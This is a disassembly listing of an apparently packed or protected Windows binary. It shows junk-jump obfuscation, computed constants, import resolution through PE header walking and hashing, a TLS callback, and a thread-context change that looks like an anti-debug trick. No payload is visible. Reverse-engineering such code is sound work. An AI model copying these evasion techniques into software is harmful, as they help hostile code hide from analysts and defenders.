; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42E014: ; CODE XREF: sub_42ED88+B�j
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
shr eax, 1
jmp loc_42E694
; ---------------------------------------------------------------------------
loc_42E021: ; CODE XREF: sub_42ED88:loc_42ED9E�j
add eax, [ebp-4]
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
cmp eax, [ebp-14h]
push offset loc_430D0E
jmp j_nullsub_10
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E037: ; CODE XREF: sub_43119E-16FC�j
sub edx, ebx
jmp loc_432637
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
sub esi, edx
jmp sub_42E426
; ---------------------------------------------------------------------------
db 32h, 3, 58h
dword_42E048 dd 7C900000h ; sub_43178D+9�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_42E04C: ; CODE XREF: sub_4321C5-144�j
jmp loc_431492
; END OF FUNCTION CHUNK FOR sub_4321C5
; ---------------------------------------------------------------------------
loc_42E051: ; CODE XREF: j8.b78ws:004318ED�j
jmp locret_42FF07
; ---------------------------------------------------------------------------
dw 38Eh
dword_42E058 dd 0 ; sub_42E2A1+16BF�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43285C
loc_42E05C: ; CODE XREF: sub_43285C+8�j
jmp loc_431748
; END OF FUNCTION CHUNK FOR sub_43285C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBA9
loc_42E061: ; CODE XREF: sub_42EBA9+74�j
jmp loc_430C33
; END OF FUNCTION CHUNK FOR sub_42EBA9
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_9. PRESS KEYPAD "+" TO EXPAND]
db 0E8h
dword_42E06C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_42E2A1+16D3�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4325CC
loc_42E070: ; CODE XREF: sub_4325CC+3�j
jmp loc_4307C5
; END OF FUNCTION CHUNK FOR sub_4325CC
; ---------------------------------------------------------------------------
loc_42E075: ; CODE XREF: j8.b78ws:00431DE4�j
jmp loc_430E59
; ---------------------------------------------------------------------------
dw 0EE66h
dword_42E07C dd 0 ; j8.b78ws:00430EC9�o ...
dword_42E080 dd 7C800000h ; sub_4306C9-1F9C�r ...
dword_42E084 dd 0E672956Bh, 646636B2h, 63369171h ; sub_431908-AE7�o
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E825
loc_42E091: ; CODE XREF: sub_42E825+3BC9�j
jmp loc_42EB4F
; END OF FUNCTION CHUNK FOR sub_42E825
; ---------------------------------------------------------------------------
dw 38D6h
dword_42E098 dd 0 ; sub_431AFE-2C67�w ...
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_77. PRESS KEYPAD "+" TO EXPAND]
db 73h, 0E8h, 94h
dword_42E0A4 dd 0 ; sub_430BB5+9�w ...
; ---------------------------------------------------------------------------
loc_42E0A8: ; DATA XREF: sub_43162A+C�o
push eax
jmp loc_42E61B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4318B3
loc_42E0AE: ; CODE XREF: sub_4318B3+4�j
mov byte ptr [eax], 0C3h
mov [ebp-4], eax
push 1Ch
call sub_42E9AD
; END OF FUNCTION CHUNK FOR sub_4318B3
; START OF FUNCTION CHUNK FOR sub_43194A
loc_42E0BB: ; CODE XREF: sub_43194A+13�j
jmp loc_42EA0E
; END OF FUNCTION CHUNK FOR sub_43194A
; ---------------------------------------------------------------------------
popf
jmp sub_431AB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432728
loc_42E0C6: ; CODE XREF: sub_432728+9�j
mov ecx, [esp+0]
mov esp, ebp
pop ebp
mov eax, ds:dword_431C38
or eax, eax
jmp loc_42E16F
; END OF FUNCTION CHUNK FOR sub_432728
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_42E0D9: ; CODE XREF: sub_431F6D:loc_4317C9�j
pushf
mov [esp+4+var_4], eax
retn
; END OF FUNCTION CHUNK FOR sub_431F6D
; =============== S U B R O U T I N E =======================================
sub_42E0DE proc near ; CODE XREF: sub_42E699�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042EA6B SIZE 0000000A BYTES
push 0E8873D17h
jmp loc_42EA6B
sub_42E0DE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430A1F
loc_42E0E8: ; CODE XREF: sub_430A1F:loc_43159F�j
mov ebp, eax
pop eax
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_430A1F
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42E0EE proc near ; CODE XREF: sub_4301B9+E9D�j
jmp sub_4326C0
sub_42E0EE endp
; ---------------------------------------------------------------------------
cdq
jmp sub_430DCF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2A1
loc_42E0FA: ; CODE XREF: sub_42E2A1+2587�j
jmp loc_42E43A
; END OF FUNCTION CHUNK FOR sub_42E2A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431A67
loc_42E0FF: ; CODE XREF: sub_431A67-5F3�j
adc ebx, esi
jmp loc_4321E7
; END OF FUNCTION CHUNK FOR sub_431A67
; ---------------------------------------------------------------------------
loc_42E106: ; CODE XREF: j8.b78ws:0042FC6E�j
jbe loc_43159F
; =============== S U B R O U T I N E =======================================
sub_42E10C proc near ; CODE XREF: sub_4301B9+C45�p
; FUNCTION CHUNK AT 0042E767 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431962 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00431AD6 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00431C30 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
jz loc_431962
push ebp
jmp loc_431C30
sub_42E10C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E32F
loc_42E11C: ; CODE XREF: sub_42E32F+18�j
xor eax, eax
loc_42E11E: ; CODE XREF: sub_42E32F+18A6�j
mov [ebp-5], al
push offset loc_42FFAB
jmp nullsub_7
; END OF FUNCTION CHUNK FOR sub_42E32F
; =============== S U B R O U T I N E =======================================
sub_42E12B proc near ; CODE XREF: j8.b78ws:0043092D�j
; TlsCallback_0+3�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E95A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042FEB6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00431B17 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004321F7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00432315 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
xchg ebp, ebx
mov ebp, esp
push ecx
jo loc_431B17
jmp loc_42FEB6
sub_42E12B endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42E140 proc near ; CODE XREF: sub_42EA96+199B�j
jmp sub_431640
sub_42E140 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAFC
loc_42E145: ; CODE XREF: sub_42EAFC+A�j
jmp loc_42EB19
; END OF FUNCTION CHUNK FOR sub_42EAFC
; =============== S U B R O U T I N E =======================================
sub_42E14A proc near ; CODE XREF: sub_42FA32+3�j
; FUNCTION CHUNK AT 0042EB6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FBDA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00430287 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00430658 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004310C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432337 SIZE 0000000B BYTES
add esp, 0FFFFFFF8h
mov [ebp-4], eax
loc_42E150: ; CODE XREF: sub_42E14A:loc_42EB6D�j
jnb loc_430287
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
cmp ds:dword_42EF3C[eax*4], 0
loc_42E164: ; CODE XREF: j8.b78ws:0042E3AC�j
jz loc_42FBDA
call sub_4309F3
loc_42E16F: ; CODE XREF: sub_432728-4654�j
jmp loc_432337
sub_42E14A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E174 proc near ; CODE XREF: sub_431651:loc_42F792�p
; j8.b78ws:00430AA7�j
; FUNCTION CHUNK AT 0042FBBF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043048A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00431A5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431BFE SIZE 00000008 BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 2Eh
jnz loc_431BFE
mov eax, [ebp-20h]
mov byte ptr [eax], 64h
jmp loc_431A5C
sub_42E174 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ECB4
loc_42E18F: ; CODE XREF: sub_42ECB4+15�j
xchg esi, [esp+0]
jmp sub_432300
; END OF FUNCTION CHUNK FOR sub_42ECB4
; ---------------------------------------------------------------------------
call sub_430754
; START OF FUNCTION CHUNK FOR sub_430273
loc_42E19C: ; CODE XREF: sub_430273+F�j
or eax, eax
jnz loc_431A3F
call sub_432300
push offset loc_431B48
jmp loc_431D04
; END OF FUNCTION CHUNK FOR sub_430273
; =============== S U B R O U T I N E =======================================
sub_42E1B3 proc near ; DATA XREF: sub_4325CC-1E06�o
; FUNCTION CHUNK AT 0042E74F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042F7B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004306DA SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00430A6C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00430D90 SIZE 0000000F BYTES
mov esp, ebp
pop ebp
push 95298AC6h
rol eax, 17h
jmp loc_42F7B7
sub_42E1B3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43137D
loc_42E1C3: ; CODE XREF: sub_43137D:loc_42E605�j
push esi
push 0AB7DA810h
pop esi
xor esi, 0F97205A2h
or esi, 0D2C9BCF0h
xor esi, 252648EDh
add eax, esi
jmp loc_431CD9
; END OF FUNCTION CHUNK FOR sub_43137D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E1E3: ; CODE XREF: sub_43119E:loc_4303E2�j
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_432006
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
jmp loc_431518
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_42E1FD proc near ; CODE XREF: j8.b78ws:0042EA7F�p
; sub_43044A+8�p ...
; FUNCTION CHUNK AT 0042F85D SIZE 0000000A BYTES
push ebp
jno loc_4311D9
mov ebp, esp
call nullsub_2
mov eax, ds:dword_432504
call sub_4302E0
jmp loc_42F85D
sub_42E1FD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], eax
call sub_4305D3
call sub_42E670
jmp loc_430CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F992
loc_42E230: ; CODE XREF: sub_42F992+12�j
push 0F80885C3h
pop edx
sub edx, 0A702FB2Eh
add edx, 0AF3D70BCh
xchg edx, [esp+0]
jmp sub_42EA8A
; END OF FUNCTION CHUNK FOR sub_42F992
; =============== S U B R O U T I N E =======================================
sub_42E24A proc near ; CODE XREF: sub_430DCF:loc_42E7DC�p
; j8.b78ws:004317E9�j
mov [esp+0], edi
pop edi
mov eax, [ebp-0Ch]
push offset loc_42FBB3
jmp nullsub_6
sub_42E24A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_42E25B: ; CODE XREF: sub_431F6D-1D2D�j
; sub_431F6D:loc_4322D0�j
call sub_432300
mov edx, 95918C9Dh
call sub_432702
push eax
rol eax, 18h
mov ds:dword_431C2C, eax
retn
; ---------------------------------------------------------------------------
loc_42E275: ; CODE XREF: sub_431F6D:loc_430135�j
ror eax, 18h
jmp loc_4317C9
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C12
loc_42E27D: ; CODE XREF: sub_430C12:loc_430C21�j
; sub_43237F:loc_432152�j
push offset loc_432359
jmp locret_430414
; END OF FUNCTION CHUNK FOR sub_430C12
; ---------------------------------------------------------------------------
jns loc_430FE9
jmp sub_430D6A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E487
loc_42E293: ; CODE XREF: sub_42E487+30EF�j
inc dword ptr [ebp-4]
jmp loc_42FFC7
; END OF FUNCTION CHUNK FOR sub_42E487
; =============== S U B R O U T I N E =======================================
sub_42E29B proc near ; CODE XREF: sub_430C2C:loc_430C33�p
mov eax, 30h
retn
sub_42E29B endp
; =============== S U B R O U T I N E =======================================
sub_42E2A1 proc near ; CODE XREF: sub_4306C9-A4F�p
; sub_43145D+4�p ...
; FUNCTION CHUNK AT 0042E0FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F95D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00430823 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043220E SIZE 00000005 BYTES
js sub_43082D
push ebp
jmp loc_43220E
sub_42E2A1 endp
; =============== S U B R O U T I N E =======================================
sub_42E2AD proc near ; DATA XREF: sub_4315A4:loc_430436�o
jz loc_431271
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_431271
call sub_42EAEB
jmp loc_4312A0
sub_42E2AD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42E2C9: ; CODE XREF: sub_43119E-232B�j
or esi, 623836CFh
rol esi, 19h
add esi, 20549417h
xchg esi, [esp+0]
jmp sub_4302E0
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4325E9
loc_42E2E1: ; CODE XREF: sub_4325E9+3�j
jmp loc_430971
; END OF FUNCTION CHUNK FOR sub_4325E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC6B
loc_42E2E8: ; CODE XREF: sub_42EC6B:loc_432245�j
xor edx, edx
push edx
push eax
jmp loc_431700
; END OF FUNCTION CHUNK FOR sub_42EC6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42E2F1: ; CODE XREF: sub_42ED88:loc_431149�j
mov eax, [ebp-4]
call sub_42FF81
jmp loc_432429
; END OF FUNCTION CHUNK FOR sub_42ED88
; =============== S U B R O U T I N E =======================================
sub_42E2FE proc near ; CODE XREF: j8.b78ws:00430208�j
; j8.b78ws:004309D7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004305E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431BC4 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push eax
mov eax, [ebp-30h]
push edx
push eax
pop edx
xchg edx, [esp+4+var_4]
jmp loc_4305E2
sub_42E2FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43145D
loc_42E311: ; CODE XREF: sub_43145D+C�j
cmp dword ptr [ebp-4], 0
jnz loc_4315D6
lea eax, [ebp-125h]
push eax
call sub_4302AC
mov [ebp-4], eax
jmp loc_4315D6
; END OF FUNCTION CHUNK FOR sub_43145D
; =============== S U B R O U T I N E =======================================
sub_42E32F proc near ; CODE XREF: sub_4309F3-1CC3�p
; j8.b78ws:00431E8E�j
; FUNCTION CHUNK AT 0042E11C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042FBD3 SIZE 00000007 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-4]
mov ax, [eax]
and ax, 38FFh
cmp ax, 20FFh
jz loc_42FBD3
jmp loc_42E11C
sub_42E32F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov al, 1
push 0A7D84826h
pop edx
add edx, 586AB28Ah
jmp loc_42EC4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431042
loc_42E35F: ; CODE XREF: sub_431042:loc_42FF02�j
mov eax, ds:dword_42E098
or eax, eax
call sub_431AFE
loc_42E36C: ; CODE XREF: sub_4326DF+14�j
jmp loc_43277A
; END OF FUNCTION CHUNK FOR sub_431042
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_42E371: ; CODE XREF: sub_4315A4:loc_43249E�j
mov ebp, 25994E2Ah
jmp loc_431DBE
; END OF FUNCTION CHUNK FOR sub_4315A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42E381 proc near ; CODE XREF: sub_43119E-2910�p
; sub_42E381+3C8F�j
; FUNCTION CHUNK AT 004319B0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00432006 SIZE 0000000F BYTES
mov [esp+0], esi
pop esi
dec eax
test eax, eax
jl loc_432006
inc eax
mov [ebp-1Ch], eax
mov dword ptr [ebp-18h], 0
jmp loc_4319B0
sub_42E381 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jge loc_431C11
jmp sub_4318B3
; ---------------------------------------------------------------------------
ror esi, 1Bh
jb loc_42E164
jmp sub_431444
; ---------------------------------------------------------------------------
loc_42E3B7: ; CODE XREF: j8.b78ws:00430876�j
push 0E16F1AC5h
xchg edx, [esp]
mov ebx, edx
pop edx
add ebx, 1ED3EB42h
popf
xchg ebx, [esp]
loc_42E3CC: ; CODE XREF: j8.b78ws:loc_42E7E9�j
jmp sub_432702
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_42E3D1: ; CODE XREF: sub_42E9AD:loc_431A3A�j
cmp esi, ebp
jmp loc_430190
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4318B3
loc_42E3D8: ; CODE XREF: sub_4318B3+1D�j
push 9DC175Bh
pop eax
and eax, 6B32E8A6h
add eax, 72F21911h
xor eax, 72592560h
call sub_4316B9
; END OF FUNCTION CHUNK FOR sub_4318B3
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_42E3F5: ; CODE XREF: sub_4321C5-1498�j
jmp loc_43207B
; END OF FUNCTION CHUNK FOR sub_4321C5
; =============== S U B R O U T I N E =======================================
sub_42E3FA proc near ; CODE XREF: sub_42EB59�j
; DATA XREF: sub_42E825:loc_42EB4F�o
; FUNCTION CHUNK AT 0042E8D1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042F9DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431CF5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043239B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00432476 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432665 SIZE 0000000F BYTES
mov eax, ds:dword_42EF3C[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_42E8D1
loc_42E40E: ; CODE XREF: sub_43094F:loc_42E610�j
; sub_4315E4:loc_42E8CB�j
js loc_432476
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_431CF5
mov eax, [ebp-1Ch]
jmp loc_42F9DE
sub_42E3FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E426 proc near ; CODE XREF: j8.b78ws:0042E040�j
; sub_43094F+1CFB�p
; FUNCTION CHUNK AT 0042E548 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004324DD SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_4324DD
sub_42E426 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E435 proc near ; DATA XREF: j8.b78ws:0043222B�o
mov ds:dword_42E058, eax
sub_42E435 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43082D
loc_42E43A: ; CODE XREF: sub_42E2A1:loc_42E0FA�j
; sub_42E2A1+16C6�j ...
jnz loc_43166C
cmp ds:dword_42E06C, 0
jnz loc_430BD2
call sub_431DF1
mov edx, 0E5254649h
call sub_42EC54
jmp loc_4324FB
; END OF FUNCTION CHUNK FOR sub_43082D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FBE2
loc_42E461: ; CODE XREF: sub_42FBE2+6�j
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
lea eax, sub_430942
mov [ecx+0B8h], eax
pop ecx
jmp loc_42E4F6
; END OF FUNCTION CHUNK FOR sub_42FBE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4327C0
loc_42E47D: ; CODE XREF: sub_4327C0:loc_42FF08�j
call sub_431CDE
; END OF FUNCTION CHUNK FOR sub_4327C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42E482 proc near ; CODE XREF: sub_4301DE-1A21�j
jmp sub_432300
sub_42E482 endp
; =============== S U B R O U T I N E =======================================
sub_42E487 proc near ; DATA XREF: sub_42F832+674�o
; FUNCTION CHUNK AT 0042E293 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042FFC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430EFE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431568 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00431AF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00432560 SIZE 0000000D BYTES
push ebp
mov eax, [ebp-20h]
call sub_42E499
pop ecx
mov [ebp-20h], eax
jmp loc_431AF3
sub_42E487 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E499 proc near ; CODE XREF: sub_42E487+4�p
push ebp
push offset loc_431187
jmp nullsub_8
sub_42E499 endp
; ---------------------------------------------------------------------------
loc_42E4A4: ; CODE XREF: j8.b78ws:00432741�j
sbb eax, 3B680BC7h
; =============== S U B R O U T I N E =======================================
sub_42E4AA proc near ; CODE XREF: sub_42FFCD+1637�p
; FUNCTION CHUNK AT 0042E77A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F881 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
neg eax
jmp loc_42F881
sub_42E4AA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E598
loc_42E4B5: ; CODE XREF: sub_42E598:loc_42E59D�j
mov edx, esp
push edx
push offset loc_42EE0B
jmp j_nullsub_23
; END OF FUNCTION CHUNK FOR sub_42E598
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_42E4C9: ; CODE XREF: sub_4308AB+FF9�j
jmp loc_430A0B
; END OF FUNCTION CHUNK FOR sub_4308AB
; ---------------------------------------------------------------------------
call nullsub_62
call nullsub_88
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_430C82
jmp loc_42FA5E
; ---------------------------------------------------------------------------
loc_42E4F1: ; CODE XREF: j8.b78ws:loc_43260E�j
call sub_42E7EF
; START OF FUNCTION CHUNK FOR sub_42FBE2
loc_42E4F6: ; CODE XREF: sub_42FBE2-176A�j
jmp loc_43093F
; END OF FUNCTION CHUNK FOR sub_42FBE2
; ---------------------------------------------------------------------------
loc_42E4FB: ; CODE XREF: j8.b78ws:0042EAB7�j
add eax, [esp]
js loc_4312D3
adc edx, [esp+4]
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_430053
cmp eax, [ebp-8]
jmp loc_42E52D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430273
loc_42E523: ; CODE XREF: sub_430273+17CF�j
jmp loc_42FDE5
; END OF FUNCTION CHUNK FOR sub_430273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42E528: ; CODE XREF: sub_430C91-ADD�j
jmp loc_4321DC
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
loc_42E52D: ; CODE XREF: j8.b78ws:0042E518�j
jnz loc_431C06
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
jmp loc_4317F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E426
loc_42E548: ; CODE XREF: sub_42E426:loc_4324DD�j
; sub_43094F:loc_4326C1�j
shr eax, 0Bh
xor [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Fh
add [ebp-8], eax
jmp loc_431281
; END OF FUNCTION CHUNK FOR sub_42E426
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4322BE
loc_42E55C: ; CODE XREF: sub_4322BE+D�j
add ecx, 4AB9FD95h
add eax, ecx
pop ecx
mov eax, [eax]
xchg eax, [esp-4+arg_0]
call eax
mov [ebp-4], eax
jmp loc_430C82
; END OF FUNCTION CHUNK FOR sub_4322BE
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42E574 proc near ; CODE XREF: sub_43119E+A4�j
jmp sub_431F41
sub_42E574 endp
; ---------------------------------------------------------------------------
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E796
loc_42E57C: ; CODE XREF: sub_42E796:loc_43065D�j
xchg edx, [esp+0]
jmp sub_430014
; END OF FUNCTION CHUNK FOR sub_42E796
; =============== S U B R O U T I N E =======================================
sub_42E584 proc near ; CODE XREF: sub_42E9AD+1EB�p
; sub_4314D8-4DF�p
push eax
push 0
call sub_431487
push eax
call sub_42E598
retn
sub_42E584 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430716
loc_42E593: ; CODE XREF: sub_430716+19�j
jmp loc_430A60
; END OF FUNCTION CHUNK FOR sub_430716
; =============== S U B R O U T I N E =======================================
sub_42E598 proc near ; CODE XREF: sub_42E584+9�p
; FUNCTION CHUNK AT 0042E4B5 SIZE 0000000D BYTES
call sub_4314D8
loc_42E59D: ; CODE XREF: j8.b78ws:0043010B�j
jmp loc_42E4B5
sub_42E598 endp
; =============== S U B R O U T I N E =======================================
sub_42E5A2 proc near ; CODE XREF: j8.b78ws:0042E86A�p
; j8.b78ws:00431513�j
; FUNCTION CHUNK AT 00432736 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
pop edx
push eax
mov edx, 0FFFFFFFFh
xchg edx, ecx
push ecx
xchg edx, ecx
jmp loc_432736
sub_42E5A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_42E5B7: ; CODE XREF: sub_430BA0-1C6B�j
sub dword ptr [esp+0], 0F4504BD6h
push eax
push esi
push offset loc_432623
jmp nullsub_83
; END OF FUNCTION CHUNK FOR sub_430BA0
; =============== S U B R O U T I N E =======================================
sub_42E5CA proc near ; CODE XREF: sub_43119E+17�p
; j8.b78ws:00431788�j
; FUNCTION CHUNK AT 0042E962 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00430042 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00431C55 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
call sub_430053
cmp eax, [ebp-8]
jnz loc_430042
jmp loc_42E962
sub_42E5CA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ja loc_4324E2
jmp sub_42EECE
; ---------------------------------------------------------------------------
shr eax, 17h
jbe loc_42F899
jmp sub_4322A3
; ---------------------------------------------------------------------------
loc_42E5FA: ; CODE XREF: j8.b78ws:loc_42FE2E�j
cmp ebx, eax
jmp loc_42F8A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4322BE
loc_42E601: ; CODE XREF: sub_4322BE-1632�j
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4322BE
; ---------------------------------------------------------------------------
